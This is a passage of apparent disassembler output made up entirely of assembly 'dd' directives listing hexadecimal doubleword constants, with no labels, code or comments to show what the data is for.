		dd 93A6B699h, 0F42529F1h, 54EB8A2Fh, 0C6475C3Ch, 0D8E37E97h
		dd 0D0322A78h, 5521A802h, 880B5C6Ch, 32F8D51Ch,	6CF4EB24h
		dd 0BEBE33B0h, 0F077E893h, 7A6826FBh, 0F148C241h, 4A9A09C7h
		dd 0CF05F31Ah, 505A2E9h, 240B08B4h, 0FC620409h,	0E7F381D0h
		dd 0E93F28BFh, 62EB9C5Eh, 0F0BE41C2h, 439112C5h, 0AD93FD0Dh
		dd 6D12A7CDh, 0CAA4C5FEh, 0DC5120FEh, 7DA82DD3h, 45D27887h
		dd 0A7C1F04Ah, 9851ED8Ah, 0CFA5701Fh, 83169B74h, 201F3907h
		dd 0FA697C44h, 0EFF3281Fh, 9C6AB9C1h, 0A10F98Fh, 5CC5243Ah
		dd 494214E0h, 14D3530Dh, 17DBA86h, 42A6E453h, 2585FF40h
		dd 88D20499h, 0CA245D64h, 9986448h, 9A145114h, 4DF41A64h
		dd 48DDB779h, 7D30387h,	15BC41BFh, 8F9F0C29h, 2BEF39BEh
		dd 0EE9840Dh, 0A05BA319h, 10875D79h, 80A43B39h,	0A001E1F8h
		dd 41945602h, 0E0028DA2h, 0B9AE2508h, 0E05162A4h, 0D4C89FE2h
		dd 0D4FA7249h, 23E91F5Ah, 8826027h, 0EDEF712Dh,	0E65F7AEDh
		dd 0AD3B8797h, 541222C8h, 0F4530A4Bh, 4CCCB3D1h, 0B9167119h
		dd 0D80142E4h, 9750165Fh
		dd 8FA2355Eh, 4157CC03h, 15D68CE7h, 47385241h, 4B020BC1h
		dd 0C048EE31h, 6028A9F9h, 0E5C73F6Dh, 14A4A836h, 0B8A59DFEh
		dd 0E83F2201h, 77153983h, 469AB7BCh, 1A9019Eh, 0D2198CD7h
		dd 0D1E8986Dh, 6BE58883h, 0AE06389Ah, 77C87DD4h, 0F1B40D22h
		dd 7C6BB9C5h, 806A1571h, 0CCFA7099h, 2C5AE341h,	145CE34h
		dd 6620DBFFh, 8E5C08A7h, 9E3A8CFAh, 534F284h, 8546971Ch
		dd 488D5C1Ah, 24192E7Dh, 0F5893A80h, 8EA64CC9h,	21A10FFAh
		dd 0A69CE447h, 20D0898Ah, 9544C453h, 0EB675F5Ch, 0A05D23E8h
		dd 0C00480CDh, 8C464860h, 62022FDEh, 3068DAF8h,	4E47FC10h
		dd 8234ED21h, 0BD71421Fh, 51AB0D04h, 558750FCh,	0BD62817h
		dd 6BC0844h, 795A59B2h,	9DC8B17Ch, 85448242h, 3900DC49h
		dd 0C52152C1h, 419D434Fh, 0ACB1C9BCh, 0FED27EEh, 0D40476CFh
		dd 4BFC8FFAh, 6E503F10h, 20134C7Dh, 373BEA78h, 237A060h
		dd 0D86F87B6h, 0CA874F41h, 207CB2A9h, 1F57EFB1h, 6F5DFD6Ah
		dd 0A0A1D875h, 40FFEA82h, 34427582h, 0BEC70EECh, 9251CBF3h
		dd 588DB52h, 6F90C492h,	5C15A8C1h, 16629C54h, 7750D55h
		dd 931F0116h, 0C44B60E4h, 0CCB69585h, 0A836EFD8h, 0F1E1E152h
		dd 536D3CBh, 0D3A92B1Fh, 83018865h, 6CF488ABh, 0AE28B7DAh
		dd 287FF94h, 75D6315Dh,	0E0AA4CD8h, 0B94D68EFh,	0C172CEB6h
		dd 18BA3C65h, 877D7652h, 0DD6A50Ah, 7A218F4Ah, 77345F5Dh
		dd 0BD663E0Ah, 0A1C90C3Bh, 6B395672h, 481A59B0h, 0C443D054h
		dd 736FC0EEh, 8FCCAD45h, 0D960080Ah, 30386956h,	528E2958h
		dd 494E5F12h, 0B20A4A80h, 1C13D857h, 9739FB63h,	910233B2h
		dd 82E80E36h, 0CEF115B8h, 8849085h, 63ACD614h, 60A7639h
		dd 87323263h, 0B1979025h, 0B5690340h, 4A9BFC26h, 0C56212A7h
		dd 53B42749h, 2C34FBF8h, 0E879D78Ah, 0BF298AC3h, 0E3041009h
		dd 15EB4950h, 5E90E49Ah, 0B2C94ACh, 0E479762Ch,	388960DFh
		dd 345A8608h, 1852D1D6h, 0A8283489h, 41913CC6h,	0DE462C68h
		dd 0CC4C0CA0h, 14872DBAh, 161B1C26h, 4E659EBAh,	5E774B0Bh
		dd 0FC30AA0Bh, 7698BD07h, 754771CAh, 85A10495h,	0AB2F22DAh
		dd 6DBFDDA0h, 0AFDDB088h, 0DC749422h, 0EBF263BCh, 0D63111D6h
		dd 2CEB91E8h, 9D1A1DD2h, 6CDEA1D3h, 59B5E3FBh, 0EF34F5Ch
		dd 7E82D5A7h, 0E864EEDDh, 0B8242F2Ah, 0A697956Ah, 58DEE369h
		dd 0D8CEB54h, 1283282Fh, 0B92C9748h, 29262E5h, 0E27D4D4Ch
		dd 0D8A983A6h, 19CD1115h, 74773B50h, 0B40AF629h, 1994A00h
		dd 878BF9C9h, 9E2A25FFh, 52D715CAh, 0F723CFFh, 0C60DE80Eh
		dd 5932AE20h, 2D5045DFh, 0AB1076BEh, 7A7A82EBh,	8AEA37B1h
		dd 0C3001E0Ch, 0B07C409h, 2F6AC825h, 547EE084h,	0E3E0105Ch
		dd 89B38FEBh, 0C2401542h, 0CE40C8C3h, 771D164Ah, 7E32C154h
		dd 0C1080EC8h, 500092FAh, 6B1FACD2h, 68629E48h,	930B3749h
		dd 78115414h, 24D1A3BEh, 2F174852h, 5AC07E0Ah, 11244869h
		dd 104427C2h, 0E19B204Bh, 2F4B8506h, 6E08AC4Ch,	0B4714382h
		dd 0F21481B2h, 77A58ED8h, 4A1CD8C7h, 786588A3h,	0C182B29Bh
		dd 6B73BEDh, 7E9B5D21h,	894AC770h, 81A93467h, 7147FB9Fh
		dd 0CF7E224Ch, 176F007h, 64E14A4h, 0B953EF03h, 62974F02h
		dd 59509DD3h, 902538CBh, 281389CAh, 0DA42CA4Eh,	57DBBE55h
		dd 62A007A6h, 0FEA0DD17h, 74EFDD3Dh, 0E18B2400h, 7AEB3505h
		dd 910FAC95h, 8A408AB0h, 9C43D795h, 3351FB2Fh, 0F9AA7C26h
		dd 5654047Fh, 89059C0h,	303727CAh, 7B0126BEh, 0DC74D746h
		dd 50F57734h, 0F530B272h, 4480D973h, 0D0975F61h, 27CCAAA9h
		dd 8A04450Ah, 0BECE221h, 85038924h, 0F983FEE6h,	94A6E33Bh
		dd 0AD13EE5h, 0FDC69138h, 0FD802081h, 0E250214Bh, 0C14D73F8h
		dd 745C494h, 289CAF9Ch,	0BAF8AE0h, 4171C164h, 0A301694Bh
		dd 4F5C383Dh, 0ABAF3604h, 565505EBh, 6940DA58h,	2F285476h
		dd 7ECA594Ch, 108C2FF9h, 78A0EB35h, 67E94515h, 1FC4FC80h
		dd 7F900FDAh, 29353FA8h, 97F97B4Ch, 1A42F254h, 5F2F939Dh
		dd 0E9DF5FA7h, 43A148A6h, 0E892C211h, 6D134D42h, 43F09C65h
		dd 9E9CF319h, 66FF9B8h,	815652CEh, 80D3A36Ah, 0B4A06565h
		dd 0A5839A09h, 40931CDEh, 619F541h, 713A4AC2h, 41032E9h
		dd 17A8528Ah, 72E7987Eh, 0BDC9FE8Dh, 91E6403h, 1B4D413Ah
		dd 0AEF8EC1Fh, 6060EC16h, 27DB2A25h, 3E0B31E8h,	8161F0F3h
		dd 9122AD96h, 12CBA380h, 0CCF0AAE2h, 13C1701Dh,	241E6AC9h
		dd 42553982h, 99957E28h, 0D7999629h, 0E073030Bh, 0D5C80258h
		dd 29B286C8h, 9761BCFEh, 102EAF8Dh, 0C61286E7h,	0D860E818h
		dd 4A11F5F5h, 2F943A8Fh, 3F5930CBh, 97299A6Dh, 0C900749Fh
		dd 889F3000h, 0FDB61C13h, 66D2DE96h, 9A4AE1A8h,	0D9162089h
		dd 9C781004h, 8361E458h, 0D2D0F611h, 0E3F641EDh, 0DD97EC3Eh
		dd 0BF3976BAh, 0BE9D834Ch, 0B03C4177h, 0ED5FB676h, 90FC18C2h
		dd 9D2F7E61h, 0ABD63ABCh, 0B522B2C9h, 0B9E35008h, 0E6539A96h
		dd 0B03D5A06h, 80972E97h, 85484D63h, 85F8C889h,	0D4479327h
		dd 7AE22063h, 0CC44BA09h, 0C849004Bh, 14DF83A5h, 0B285AB03h
		dd 0EBCAC168h, 0FE152E14h, 5D65A1E5h, 0EB0B17F6h, 0A420271Ah
		dd 0A2FC5263h, 75F893DDh, 0F1061B78h, 2023813Fh, 56949FA3h
		dd 0EA5C224Ah, 1490D129h, 25A98D5Ah, 0A81821D9h, 46CE011Ah
		dd 4AEFD780h, 0A02D960Eh, 0E8C0E37Ch, 4F342BC4h, 1C71B975h
		dd 0FC087770h, 0DA10F855h, 21A3B713h, 57DE414Dh, 98876108h
		dd 0D25F7709h, 0ACF4546Ch, 32385FCh, 0AAA80416h, 0BD8F924Bh
		dd 7E96C74Ch, 85A3E44Dh, 748CAF1Bh, 75104BC5h, 0FB142E6Ah
		dd 5F8A825Dh, 0CAAD2531h, 0AC3FAF5Dh, 0EEE45364h, 87B26408h
		dd 7AB148Ah, 0E08AEE5Ah, 0CC7A9243h, 0ADB118E4h, 0FC05E7E2h
		dd 70A5008h, 1F6E9770h,	0F50EF7FCh, 0FC252512h,	70E46426h
		dd 681822FBh, 743175Fh,	0F740D4D9h, 836CE3A5h, 0FACFF2BBh
		dd 9CC0D142h, 0C1948B43h, 0F2FC9D76h, 0B9A18EBBh, 97D05D5Ah
		dd 6413A24Fh, 9C92E275h, 3B169553h, 33075E66h, 3EDBEDCh
		dd 772FC129h, 124EF9h, 8E0871DEh, 3E9A709Dh, 57224036h
		dd 0C8526705h, 8AEB678Ah, 0C650BF36h, 43F7571Fh, 5747940h
		dd 0DC7E0504h, 54A4CF9Dh, 0BB3A4046h, 7D853BCAh, 0C2E05605h
		dd 83A20290h, 0D85D48BFh, 4367FF17h, 179EC031h,	6BA30D01h
		dd 0CEFACF00h, 25AF03FCh, 397EF7D9h, 0EC93930Ch, 3283AE60h
		dd 109C9840h, 0D314FC75h, 7CF10FBEh, 8514EFA7h,	60932A18h
		dd 164BE017h, 8F468014h, 12DFAC27h, 7B902D83h, 43C05D7Ah
		dd 0A7B904D0h, 889A253h, 0E4D11453h, 24BA3E9Eh,	45304C2Ah
		dd 0E9EE7B8Dh, 0C3224891h, 0B9243D14h, 58A443A7h, 630A483Ah
		dd 0BA75BFF7h, 0E82A4F05h, 0DCB59C48h, 316AE238h, 9A31440Dh
		dd 0D15046D8h, 5733D562h, 0AA90B515h, 81B649CBh, 8B9A93BBh
		dd 0D5470765h, 0BEC9D600h, 251D9A0Bh, 41777514h, 749742D2h
		dd 92438421h, 0B0993A68h, 0A21FB221h, 0E2FFF240h, 0B64D94E0h
		dd 0A6B52EE5h, 12F569ABh, 0B60E01A3h, 2E2F4C2h,	5F796032h
		dd 7914EBF5h, 90CC0E7Fh, 3BF98E8Bh, 63BF32F3h, 85E8280Eh
		dd 54277891h, 0F8A386F0h, 2D5993D0h, 831DABD0h,	5AEBC695h
		dd 41155DE6h, 2D5CEAB5h, 6A31571Dh, 0C9EFA577h,	816E558Dh
		dd 955F61DDh, 8C4C5B20h, 0E92B5D01h, 7F255979h,	0D5404F0h
		dd 7C30F6A8h, 0DD292EE7h
		dd 0AD41B183h, 79F5556Ah, 7760743Eh, 0C1201DB9h, 0C47AB4E3h
		dd 0FF897F59h, 5A62EBBCh, 5C5EBBB6h, 82CA63A0h,	7FEA3FC7h
		dd 0A5701D56h, 7A98CABCh, 0E6B8C250h, 45A99602h, 0F2A6BD7Eh
		dd 9A2CE7EBh, 39071313h, 0EAB022ACh, 4397E44h, 9577CE3Ch
		dd 5882AE90h, 6AD93B80h, 7CA16262h, 9A3E602h, 4A1BA110h
		dd 0C09B7B33h, 7FE08668h, 5442EB9Eh, 0B131EEE8h, 663C1F53h
		dd 0D46521B8h, 8983BE10h, 6F4B1316h, 0D070E3BBh, 0A2965A94h
		dd 0BC61831Eh, 0FE4EC428h, 0A4C93B6Ah, 12EB510Bh, 7EE45FE4h
		dd 98C8A9C0h, 0F8940717h, 0D42F49BCh, 9FF0C138h, 37D8FBBEh
		dd 8614DA2Bh, 0B859FF7h, 0CA92A5BCh, 9C5341F0h,	0FD05E7CEh
		dd 210DC60Ch, 54C8FA21h, 2A54294h, 5F4E87FEh, 46A01943h
		dd 72E92205h, 0E4938465h, 0B47CF96Ah, 8AFE2B8Ch, 9C067AEh
		dd 1DFB7E18h, 0AEB62641h, 0F3626C86h, 747D84D8h, 9EABCD89h
		dd 1F78312Bh, 7F20EB49h, 27C51570h, 4FEAEFD5h, 0A91AB311h
		dd 752DE861h, 7C2F10D0h, 0F42902B4h, 62A06CACh,	0DCAB15C7h
		dd 0A1B76646h, 0C0F84342h, 681E6DDh, 60C6EA7h, 2A8E88DAh
		dd 0E199A0DAh, 0E408F595h, 818D8D89h, 675CA864h, 0B14A1005h
		dd 1DB93382h, 1756602Ch, 9E5706CDh, 269C39C5h, 0A9E217C3h
		dd 0CBD15E52h, 0C33423B3h, 4BF595F0h, 0F45C2B77h, 4DAC5135h
		dd 187FFFF2h, 19621E71h, 70A20868h, 0C54D8587h,	3E82EFC9h
		dd 0B538F6C1h, 9B4F13E0h, 0C9FD722Ch, 3F9F57B9h, 0C70CCE94h
		dd 0A9C145D4h, 0B1B0BBF3h, 0EB3BF3C0h, 9C5B487Ah, 50779365h
		dd 64A5D2A1h, 1FFAE6D7h, 64178FE8h, 3E63AF56h, 0D35E291Ah
		dd 0ABF7AE3Ch, 5D17800Ch, 82A2D903h, 406951EFh,	0C5234B43h
		dd 982E69DDh, 0DB57173Dh, 876AA0C5h, 6EB2EFA3h,	5C568157h
		dd 38F0DFFFh, 5A76948Eh, 9F8A508Eh, 0F8BCF5C8h,	49C59B07h
		dd 13AB2AA3h, 3CECD183h, 5E3E3680h, 0D31CB61h, 0E51B9C64h
		dd 0D9A7D0AFh, 5F1A78CAh, 81F131ECh, 3175E90Eh,	39F24092h
		dd 0A24EFCB0h, 0BE311BC9h, 8A051012h, 50B435Fh,	4D0342ACh
		dd 32B9E954h, 0F555B7D1h, 0B868F3B1h, 9D2373B9h, 0AAAB3EE6h
		dd 4826074Ah, 0F5E2B1A0h, 0F0414221h, 1C2B8957h, 8B011D76h
		dd 9E278051h, 738717DCh, 4EF80292h, 9C19EBACh, 122ABE9h
		dd 0D194BAE0h, 70517888h, 0CBE23F09h, 2C3E0E5Fh, 16FB1540h
		dd 81B09FB0h, 0B9910F21h, 73B9E3C9h, 0EE0E5064h, 28DB1F76h
		dd 0AABFD015h, 2BB0C719h, 0BCFBFDD5h, 76B6E230h, 557D9C15h
		dd 2ADEBE5Ah, 5A7C682h,	7C7D66FCh, 47DE7C71h, 1A806805h
		dd 9BCE58B7h, 8EFE922Ch, 0EA89AD15h, 0ABEF0DA3h, 6A064953h
		dd 1DCEE9DEh, 0CBA4EC32h, 0C32B31A5h, 0F434370Bh, 8DF509FBh
		dd 0CFFE7680h, 0B159D82Ah, 780C32ACh, 1AF83328h, 26803289h
		dd 4302FEDh, 95634504h,	0BFA4A028h, 120A091h, 8E37CC0Dh
		dd 69F57214h, 0AA4CD4F1h, 0D678C2F0h, 0FE18CBB9h, 0F97D2206h
		dd 403099A8h, 5DE6FAC0h, 0D254D5E5h, 83E04175h,	0FA7D8415h
		dd 2103670Ah, 4A04B5E2h, 20825D8Eh, 3748527Bh, 80FE4E3h
		dd 4891A989h, 1F5C438Ch, 0EB4F20E6h, 0B146116h,	556B93AFh
		dd 84D68BD2h, 5502A2C4h, 0C57A886Dh, 0AB38317Fh, 1120E910h
		dd 5D65BB58h, 6C15B573h, 0B473C1D8h, 447772F4h,	2A0A5F73h
		dd 0C81CD8C9h, 3414AF9Ch, 2129D59Eh, 49754AA0h,	53C5C365h
		dd 83293D46h, 3C3EDC28h, 69DC8982h, 46703C06h, 5FB85DD4h
		dd 5D9D0E95h, 1D5F9F97h, 938D10ADh, 30136BD2h, 0A0BAA842h
		dd 5395A174h, 88A6F9D9h, 22A37D8Eh, 5D9D0CACh, 0BE51520Ch
		dd 692FFD7Dh, 26B7DBBh,	1E10DA0Dh, 0BFCD70B4h, 51015BE4h
		dd 14F14847h, 301403E0h, 0E9329A06h, 440ED2Fh, 0B4DA80F3h
		dd 0C1740227h, 51057D0Fh, 0BA4C8C18h, 640A56Eh,	737CD83Dh
		dd 226E8BB2h, 0D0C0A0ECh, 81B111AFh, 78CA3B82h,	0F045A843h
		dd 9534E261h, 0FE09AFA7h, 92F08C0Dh, 0FAE68007h, 3C5687Eh
		dd 26EB7BD7h, 6E5880A6h, 7758E463h, 0C1AFD9A7h,	0F414A5D0h
		dd 97CF1EBh, 6B14DDDEh,	0F29F7D58h, 0C82DE302h,	0C38E082Bh
		dd 0B60E310Ch, 0C644AB41h, 2316F2BBh, 1ED45712h, 66508818h
		dd 31B3C205h, 0EB51D410h, 0AADCE24Dh, 0CFBA8BAh, 47F7F79Ah
		dd 343EB224h, 0D04C4CB0h, 0F2CA1457h, 0DE78F27Ah, 3360E182h
		dd 0E87780EDh, 0E46E282Bh, 84228155h, 17463DC0h, 0E911B2D7h
		dd 0E5659962h, 4124C0Fh, 4212B63Eh, 0B1701448h,	112F24AEh
		dd 0B774848Eh, 3885110Fh, 87DF4331h, 10847D2Ch,	65159FDAh
		dd 0E9526542h, 6D225593h, 638ABFD5h, 0B7D5C5D0h, 33E66DD1h
		dd 2F2EB365h, 0A955D396h, 71AA3180h, 9C51F439h,	2B866118h
		dd 4CAF555Dh, 0D51DE668h, 0EE475845h, 8CA19202h, 1BDC240Fh
		dd 0B8DE325Fh, 3529A8AFh, 40F9149Ah, 7F950C87h,	864844D5h
		dd 0B29A31FFh, 0D24F537Bh, 20520CE5h, 54C9D5DAh, 5E802CBFh
		dd 18B3559Fh, 0C2F6A380h, 8252918h, 91FF1B7h, 832FFA66h
		dd 0D568522h, 0D90AB75h, 0D0043460h, 16F36A82h,	0A75E0C0Fh
		dd 552DBCBAh, 302FB868h, 5971E160h, 937DFDCFh, 293B2580h
		dd 3635DB3Ch, 281083DFh, 4209EADEh, 2EBF1746h, 8BDDB8DFh
		dd 520310E2h, 9A9444h, 6E4B9BA1h, 38AE80ABh, 28763338h
		dd 0BAB1A9F9h, 2D190592h, 0D6EC9B4Bh, 0BC5D050Eh, 2BBEAEFDh
		dd 0E6115651h, 16EE4104h, 66345751h, 0A0953BC5h, 0FED9BF12h
		dd 928CE310h, 0DD2CE761h, 0AC6201E7h, 18CE5183h, 0CBE03741h
		dd 6D0C310h, 0F112E344h, 88D01C9Fh, 80A4E02Fh, 2315063Fh
		dd 8A2A7003h, 98EB3010h, 48112957h, 8869FBC2h, 0F3CACEB0h
		dd 433966F4h, 0CCAED488h, 0A742CF54h, 451A0F40h, 0DF963DC0h
		dd 9E8876C0h, 2BD1FD52h, 325A0285h, 865C0777h, 0BB627746h
		dd 5057E30Bh, 0F50001D9h, 117F8FCBh, 0A2B9AD22h, 15A82ABAh
		dd 0DD9A4CE8h, 4A57D595h, 7F9A53CDh, 8B65FBE8h,	72267D6h
		dd 0D33D8138h, 0D3D9045Ah, 0F5E93D15h, 0C0506150h, 68EDD412h
		dd 0EA5EEE62h, 96DC7137h, 0DD43A35h, 3303EEA2h,	0E5A8F741h
		dd 0F2D93E59h, 7F15583Bh, 1C99E4F0h, 0BAC90A72h, 0AD0B0746h
		dd 0EEEA157Ch, 518AC79Fh, 82FFE918h, 0F28015EDh, 2802564Fh
		dd 95C5A83Bh, 516D5C15h, 0F49D55E8h, 766B7E99h,	0B943EE41h
		dd 872BA90Dh, 4610F095h, 0F48149C5h, 17580494h,	0B0D140D2h
		dd 278067DDh, 0B2C9DC73h, 98D9CDBh, 4C8715E2h, 0FD6DBA4Ch
		dd 6E2847F1h, 0E7FE41F4h, 547E2FD5h, 0B26FEF18h, 3AB34754h
		dd 85259255h, 0C62508F7h, 7BF93E88h, 0BCFCD05Ch, 0A8321696h
		dd 0AF4C453Eh, 45B4C917h, 8C62091h, 74A48377h, 6A99123Fh
		dd 0CA4331BFh, 0B559234Ch, 9B0A58C5h, 904857F1h, 4325FE2h
		dd 0D5F37E17h, 84554ADFh, 0C9C907C7h, 0D670FD79h, 74B058C5h
		dd 1EAAC78Dh, 4D32B24Fh, 0BD5008A8h, 0F5CE48D1h, 252C6516h
		dd 71BA58AFh, 587F70A4h, 4581603h, 39C0DA0Fh, 0CFC904ACh
		dd 7F5B5017h, 7271C256h, 0D74CE968h, 0C04C182Ch, 0EC2245FFh
		dd 0A2F7958h, 0ABACA3Dh, 0AD52E5D2h, 2FAD500Eh,	222528E6h
		dd 0C8A52657h, 0C3915649h, 9BD5975h, 996A7778h,	3E525475h
		dd 0B54045D2h, 6845EB34h, 0D9AE71B4h, 0DAA641A2h, 7ACC714Eh
		dd 0A3D3F3F2h, 0CE41B0D3h, 0F5D51E34h, 8C1133B3h, 8875C4C4h
		dd 54647FF8h, 65B4D952h, 0B3B0BD7Ch, 0E0756BEBh, 432B0784h
		dd 858D6F59h, 0BFACEC28h
		dd 65BD159Bh, 21756895h, 71EC91E6h, 0E245A6Ah, 0BD29A003h
		dd 1A297B1Ah, 50A16519h, 7D52AB42h, 0ED1D4507h,	0C5BE6ABAh
		dd 0FA0656ECh, 7688CC0Ch, 0FC8FB2B3h, 469BAB8h,	0E35135D8h
		dd 2989F81Dh, 92B09556h, 0EE4941EEh, 491ABC56h,	7E5218B0h
		dd 0BA6A2A57h, 83B89FD6h, 5316B3FAh, 3A8BB0F4h,	0C22FBAADh
		dd 634D0790h, 0D3FABF7Fh, 583A0BD9h, 0F1158965h, 0EE2A46BAh
		dd 0EC1AC5BDh, 0BA998574h, 0F28E2E75h, 5FE879BDh, 35E1ADA0h
		dd 2A224D9Ch, 0AA444F88h, 76009032h, 98409F45h,	0B1B5B017h
		dd 0DA07924Ah, 221F8F87h, 0F8DF4033h, 445A5C5Ah, 0E94F482Dh
		dd 685A09E6h, 0BE70655Ch, 0C7441236h, 0D7CBC2D1h, 9396B969h
		dd 0AFF0EC1h, 4A1C3F01h, 0DB098E61h, 0AA64127Ah, 549456ABh
		dd 7C6F4F38h, 0F2F94014h, 0F21715C8h, 5837049Dh, 539915F8h
		dd 1CB8EE79h, 7C5BF36Bh, 0E03C120Eh, 1351B73Ch,	877494B9h
		dd 0FCD08633h, 64888939h, 11C2B460h, 6362414h, 28AA2051h
		dd 1468F206h, 27946211h, 1D3138D0h, 0CA8CB951h,	79562D6Eh
		dd 1D0F7CB2h, 877C5443h, 0A4C37892h, 3373D86h, 6D0BBCDEh
		dd 2A950F36h, 55561AA6h, 5D378ADEh, 0B45CE46h, 56721946h
		dd 217909E7h, 419C360Ch, 1FB1FD38h, 0FA3ABAD7h,	5299C8FDh
		dd 20A8B224h, 154B0359h, 1C2E4F9Ch, 360F1F58h, 5262B0DAh
		dd 32A38710h, 3363F1ABh, 0EEF74F8Ah, 38E0D7D2h,	74818275h
		dd 2ED1393Ch, 3C066AFFh, 4015F471h, 132E0EA5h, 10340ACDh
		dd 5300B6A5h, 877AC440h, 0AC7A0B2h, 0C36F9658h,	7D3C2B1Eh
		dd 6F8FD759h, 8B1B893Bh, 52C7FA35h, 9D83F2C6h, 0EE5D49F0h
		dd 0AFC4843Ch, 731EF7B4h, 0D3B6E60Eh, 0F7C6AF6Eh, 0B90C62Fh
		dd 63ECCB22h, 28D81178h, 0C572C37Ah, 0C9A0AAE4h, 4AF68A77h
		dd 7FFBB910h, 31555FA4h, 7D58B210h, 98E8FA1Fh, 71EC8E5Ch
		dd 2721D1C7h, 0EE81E1C1h, 21F3197Fh, 1F4B67A2h,	0BDB79ADCh
		dd 0B3AE3D7h, 0C24B7D25h, 63C0A574h, 0CFEC9628h, 0F7D0B3D2h
		dd 82CFA42Ch, 17BF846Fh, 36001286h, 0A5D20AD9h,	0C4A1A293h
		dd 3EB14A6h, 0B9ADBF02h, 2578CEE6h, 0B7FB120Fh,	59C0188Fh
		dd 0C71543F0h, 7544ABFh, 27595D0Bh, 94BBC9E5h, 0C5C85135h
		dd 78926605h, 8652271Ah, 38E4115Ch, 2524ACB0h, 0AFAE48F1h
		dd 66A646C5h, 0E0EF1E95h, 0F08D6862h, 143F37CCh, 943F6270h
		dd 24197B51h, 49CE266Ah, 0E2A682AFh, 9ECE6A67h,	5E8E6AEh
		dd 59411A12h, 0B57455C5h, 1F1E177Dh, 0A29953D9h, 0CE2659F5h
		dd 17A88DA5h, 1B7CA2C6h, 0BB5A0583h, 18B8DF29h,	0AF74F924h
		dd 7F528CEFh, 0DA248D60h, 23EB6547h, 77287E21h,	81204EFAh
		dd 0CC9A57DAh, 0E1665597h, 0DFDE4FF3h, 1A0BBA48h, 0ABEB6914h
		dd 0D72AA455h, 0AED4A956h, 360209E7h, 8E10118Fh, 0C3B20E26h
		dd 0A92F572Ah, 0C8DD8D74h, 52E59424h, 598AE567h, 0F8BA2C35h
		dd 254A5DA4h, 728B8A9Fh, 378110AEh, 168EB97Ch, 6A89566Fh
		dd 775E5411h, 0C0A5E93h, 37C3B8FBh, 0DA83094Ch,	8BE963EDh
		dd 41A6CAFFh, 0D5295D56h, 5E1511A7h, 158CDEA0h,	43D7D4E0h
		dd 0E6F5EFFFh, 954F0777h, 35B626FFh, 37F00425h,	1562AAAAh
		dd 6D845B5Fh, 8A050671h, 0FBF5C2A0h, 569C0531h,	0DFB4650h
		dd 84AB5252h, 56744423h, 0C355E453h, 0B06461ADh, 3A8BF001h
		dd 0DC04E095h, 0AB62FFDDh, 452D908Ah, 79484B14h, 0B711AAFDh
		dd 40FF206Fh, 0A21D06Ch, 55F076BAh, 3E3779EBh, 0A5444916h
		dd 0B5952A54h, 143022EBh, 0F06A378Eh, 26778ABEh, 0E0252EF9h
		dd 552566E5h, 0E5EC4255h, 654A797Fh, 1F547DFAh,	0ABACB2E8h
		dd 67151A1Ah, 0EB39225Dh, 62C2324Bh, 0DA2C968Ah, 650F72B4h
		dd 0D08CAA45h, 26BDA9C0h, 79754CF4h, 1E0A7155h,	0FD396857h
		dd 2FD209C3h, 0D172AEC5h, 0CE2325E9h, 409D4CA4h, 0BF6C0169h
		dd 7320F2EEh, 0F8341F25h, 317D8A4Ah, 728383C0h,	41D880AEh
		dd 26ACC018h, 7C30ABCFh, 0BEDF5D67h, 0E5A420D1h, 0C497985h
		dd 9B442312h, 6C0B43CEh, 0C9AE19F8h, 55D5C599h,	254D806Bh
		dd 78AC2D09h, 82096DF9h, 0AABF7FCBh, 9DC7C580h,	14841922h
		dd 95FA595Eh, 0F04C631Ch, 8FB9876Ah, 0B94DFA55h, 49FC2181h
		dd 45DEF1B4h, 0F135227Ah, 0C57FD42Eh, 7ADC06A9h, 0C8A817C4h
		dd 0B8728E71h, 96ACD22Eh, 565F281Ch, 8F75F824h,	4732C4A0h
		dd 0D3D74219h, 0C2C31087h, 5127031Fh, 0B7CC6850h, 2A21A92Ah
		dd 7F00B246h, 0E0ADD207h, 2E8253C4h, 23EC3594h,	45C8A8C4h
		dd 5A108534h, 0AAA6F21h, 4BA084Eh, 0B2388C79h, 0D1754A44h
		dd 31FA83EEh, 19993409h, 584A749Fh, 3C28E54h, 6BECFACBh
		dd 4E50FD45h, 4593F8A2h, 0A71984A7h, 0C19A3E8Bh, 7C686AE3h
		dd 34D8F930h, 0E44047AEh, 80522E8Bh, 0E2ABA8Eh,	0CA61D05Eh
		dd 6909CCC9h, 0AC10A922h, 7066AD8Bh, 0A63C043Dh, 155D89C0h
		dd 85DB89h, 3BE539E5h, 87885D48h, 0C233EBACh, 6CB013BAh
		dd 155C50DFh, 0A4E7442h, 32A7DBEh, 5538E451h, 0AD3656CAh
		dd 0F494AA91h, 0C5D9B02Bh, 8276079Eh, 11D5703h,	431A0D8Ah
		dd 0FFF1B487h, 740CB0F0h, 0D3E00150h, 85F140ACh, 0D4BAF891h
		dd 50257051h, 36D57514h, 0D40688CAh, 8EFD0505h,	77E9EFC0h
		dd 782E912Eh, 0E594E8B2h, 0F8A7F386h, 0EEF116DBh, 0B31E174h
		dd 0FC25E0EAh, 5DA284D4h, 575FFF0Ah, 353A125h, 0B7D1E69Eh
		dd 8221AA6Eh, 9E5E9C9Ch, 82AEB92h, 0E534F745h, 8B2F855Dh
		dd 6CA3F635h, 7EF4B2B8h, 230F5B5Fh, 0F15C6FEDh,	8E8AD50Ah
		dd 0B4558DA3h, 30166F09h, 2851B450h, 0D0454B9Ah, 42103315h
		dd 88C23E0Bh, 2DC6C9C9h, 7C0FBA12h, 69BFC6D9h, 9B994B86h
		dd 496C7FFh, 0F5A67BCFh, 0A12510FEh, 66C50164h,	0E7064E8Eh
		dd 61BF8207h, 0FDA15DFEh, 28C78455h, 375479F4h,	673A3916h
		dd 0ABE25F8Fh, 59D341FCh, 0DCE5FF37h, 0E73AA69Ch, 0E4811AACh
		dd 9AD52F86h, 88F5CE2Eh, 58D11126h, 1445AA05h, 4E7982BCh
		dd 3914DCBBh, 0E3FD14CEh, 0D763EF44h, 7463F7AFh, 81120990h
		dd 0C47C8E4h, 0A6AC208Dh, 0CC0F2308h, 0AFE98A53h, 1CB7FFE0h
		dd 5E6A7A4Dh, 9164D59Dh, 2D442E96h, 6F299FD4h, 0A1066A6Ah
		dd 46115736h, 15973973h, 0A4E32E91h, 0EB6352A6h, 285A4816h
		dd 70E0CB71h, 0B914EAA0h, 1A46D8D7h, 0C51C40D8h, 0D4551B29h
		dd 0A3CEE5B6h, 0A3CB5166h, 4A1D4C2h, 8B1068D1h,	73EA8D9Ah
		dd 95B172DAh, 9E526D98h, 0C9072583h, 7ACAD28Ah,	3B0E555Dh
		dd 0FB3D7FDBh, 491171D4h, 5EFB88AEh, 8E2794F8h,	0F0CA7AD0h
